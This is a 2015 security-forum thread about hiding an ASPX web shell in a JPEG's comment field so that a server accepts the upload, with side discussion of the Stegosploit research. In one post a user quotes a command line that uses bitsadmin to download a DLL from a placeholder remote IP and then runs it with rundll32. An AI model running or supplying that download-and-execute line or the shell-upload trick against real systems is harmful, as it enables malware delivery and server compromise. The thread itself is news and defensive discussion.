How to use a malicious JPEG to hack corporate networks

Discussion in 'other security issues & news' started by Minimalist, Apr 20, 2015.

  1. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    14,881
    Location:
    Slovenia, EU
    http://securityaffairs.co/wordpress/36130/hacking/malicious-jpeg-hack-corporate-networks.html
     
  2. J_L

    J_L Registered Member

    Joined:
    Nov 6, 2009
    Posts:
    8,738
    Now that is quite the exploit if I read correctly (didn't manage to see the video).
     
  3. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    14,881
    Location:
    Slovenia, EU
    I've checked only beginning. He updates attributes of jpeg file (using comment field) and puts active content (aspx shell) in it. Then he renames jpg to aspx and uploads it. Server accepts is. When viewing the modified picture shell executes. After that I guess it's game over.
     
  4. Gullible Jones

    Gullible Jones Registered Member

    Joined:
    May 16, 2013
    Posts:
    1,466
    Didn't see the video. @Minimalist, from your description this is an IIS problem? Sounds almost in the same vein as Shellshock, really.

    BTW

    Not sure the domain controller would dependably allow file uploads? I know very little about AD and LDAP on Windows. That said, environments where Linux or UNIX servers are administered from poorly secured Windows workstations tend to give me the willies...
     
  5. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    14,881
    Location:
    Slovenia, EU
    From what I've seen at beginning I can't tel if problem is in IIS, Asp or problematic function/program. It's also only first step in exploit chain and shell is run under user rights.
     
  6. noone_particular

    noone_particular Registered Member

    Joined:
    Aug 8, 2008
    Posts:
    3,798
  7. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    4,020
    Location:
    California
    Yes, I remember this!

    There was a long thread at DSLR where Wayne (owner of DiamondCS) demonstrated the technique of modifying a JPEG file.

    That exploit's payload was a file written to disk, which was an easy block for those who had such protection. I'm not sure exactly what is going on in this current exploit:
    Well, we don't know if this is true always or not: what types of other protection does the network have?

    (DiamondCS was a company ahead of its time in many ways. ProcessGuard and WormGuard were wonderful products -- some still use ProcessGuard.. I was evaluating different anti-executable products at that time, and was impressed with ProcessGuard.)

    ----
    rich
     
  8. noone_particular

    noone_particular Registered Member

    Joined:
    Aug 8, 2008
    Posts:
    3,798
    A short time ago in another thread that asked about file types that can be used maliciously (too lazy to find it ATM), someone mentioned that many of those were not issues on up to date systems. Yet here we are again with file types one would assume to be safe being used as attack vectors again.
     
  9. WildByDesign

    WildByDesign Registered Member

    Joined:
    Sep 24, 2013
    Posts:
    2,587
    Location:
    Toronto, Canada
    Inspired by Marcus Murray's presentation (https://vimeo.com/103938583), security researcher and developer of Bouncer, Florian Rienhardt has written a follow up on his blog which includes an adaptation to the presented method and was able to utilize Microsoft's built-in bitsadmin.exe to achieve similar execution of malicious downloads.


    Blog: http://bitnuts.de/
    Research on bitsadmin.exe: Microsoft’s built in Malware Dropper?
    2015/05/21 by Flo

    Code:
    cmd.exe /c bitsadmin /transfer transaction /download /priority HIGH hxxp://xx.xx.xx.xx/Injected.dll %temp%\a.dll >NUL & rundll32 %temp%\a.dll,0
     
  10. Minimalist

    Minimalist Registered Member

    Joined:
    Jan 6, 2014
    Posts:
    14,881
    Location:
    Slovenia, EU
  11. Gullible Jones

    Gullible Jones Registered Member

    Joined:
    May 16, 2013
    Posts:
    1,466
    Noscript et. al. could potentially work against that, due to the first stage JS needed to load the code embedded in the image. Also it still has to deliver an effective exploit, including a sandbox escape in the case of Chrome or IE. It'd be a heck of a vehicle for delivering the actual attack though.
     
  12. ichito

    ichito Registered Member

    Joined:
    Jan 14, 2011
    Posts:
    1,997
    Location:
    Poland - Cracow
    Saumil Shah has said
    http://www.net-security.org/secworld.php?id=18443
    http://motherboard.vice.com/read/how-you-can-get-hacked-just-by-looking-at-a-picture-online
    and of course that words can scary...but I found text on blog below and I think it lowers "charm" of Stegoploit
    https://medium.com/@christianbundy/why-stegosploit-isn-t-an-exploit-189b0b5261eb
    It's real danger or only researcher's mistake?

    BTW...below presentation of author
    http://conference.hitb.org/hitbsecc...il-Shah-Stegosploit-Hacking-with-Pictures.pdf
     
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.